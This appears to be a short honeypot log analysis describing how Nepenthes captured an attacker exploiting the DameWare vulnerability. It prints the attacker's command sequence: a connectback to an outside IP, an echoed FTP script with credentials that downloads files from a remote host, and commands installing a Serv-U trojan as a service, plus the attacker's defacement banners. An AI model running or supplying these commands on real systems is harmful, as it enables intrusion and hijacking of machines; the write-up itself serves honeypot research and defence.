Lets assume, somebody connected a box running nepenthes, tried to exploit the DameWare vulnerability with a known shellcode.

Socket TCP  (bind) 0.0.0.0:0 -> 0.0.0.0:6129
        DialogueFactory DameWare Dialogue Factory creates DWDialogues could Accept a Connection

Accepted Connection Socket TCP  (accept) 81.164.174.142:1092 -> xxx.xxx.xxx.xxx:6129

Detected connectback shellcode konstanzConnect, 81.164.174.142:10000

Nepenthes would try to connect the attacker and offer a shell.

Connecting xxx.xxx.xxx.xxx -> 81.164.174.142:10000

and would receive commands to download someting, but fail.

Handler ftp download handler will download ftp://Leech:NFe@69.134.194.126:1337/nofileyet 

we would have a look on the logfiles.

at first a dir was created, and the shell changed to that dir.

Line (38) is 'mkdir c:\windows\system32\dhcp\config
Line (28) is 'cd c:\windows\system32\dhcp

then the old echo game started and a file ccc.txt with content

'open 69.134.194.126 1337
Leech
NFe
hash
bin
prompt
mget *.*
bye
'

was created.

then the file was used as a scripted sequence for microsoft ftp client.

Line (15) is 'ftp -s:ccc.txt
...

file content is is
open 69.134.194.126 1337
Leech
NFe
hash
bin
prompt
mget *.*
bye

and here nepenthes failed to parse, as he does not know the required 'mget'

Handler ftp download handler will download ftp://Leech:NFe@69.134.194.126:1337/nofileyet

then the shell session went on

Line (12) is 'usb2.exe /i
Line (15) is 'net start usb2
Line (33) is 'copy mw.txt c:\windows\system32\
Line (33) is 'copy mc.txt c:\windows\system32\
Line (12) is 'del ccc.txt

So … lets have a look on the text files.

cat mw.txt

                               ''~``
                             ( o o )
+------------------.oooO--(_)--Oooo.-----------------
|                                                                |
|                   Hacked By LunaNluv           |
|                                                                |
|                     ooO                                    |
|                      (    )Ooo                             |
+----------- ---------\  ((     )------------------------------
                         \_)) /
                           (_/

______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
This Server is running since %ServerDays days and %ServerHours:%ServerMins hours,
and has been accessed %loggedInAll times, %u24h in the last 24 hours.
There are now %Unow users logged in, Max allowed : %MaxUsers.
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Free Disk Space : %DFree MB
Downloaded : %ServerKbDown Kb in %ServerFilesDown Files
Uploaded : %ServerKbUp Kb in %ServerFilesUp Files
Current Speed : %ServerKBps Kb/sec
Average Speed : %ServerAvg Kb/sec
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Do NOT rehack
Do NOT rescan this range
Do NOT abuse the server
Do NOT pass the IP & login to some-one else
Do NOT WHINE about everything
Do ENJOY this server
______________________________________________

cat mc.txt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
  Free Disk Space : %DFree MB - Current Speed : %ServerKBps Kb/sec
________________________________________________ [ Luna ]

So a last look on the file …

md5sum usb2.exe
b3ca5006f354f97afca15e14298e2681  usb2.exe

clamscan usb2.exe
usb2.exe: Trojan.Servu.1 FOUND

i'm still smiling about this poor guy who uses autorooters to tag ftpds, and we will think about adding mget to the VFS.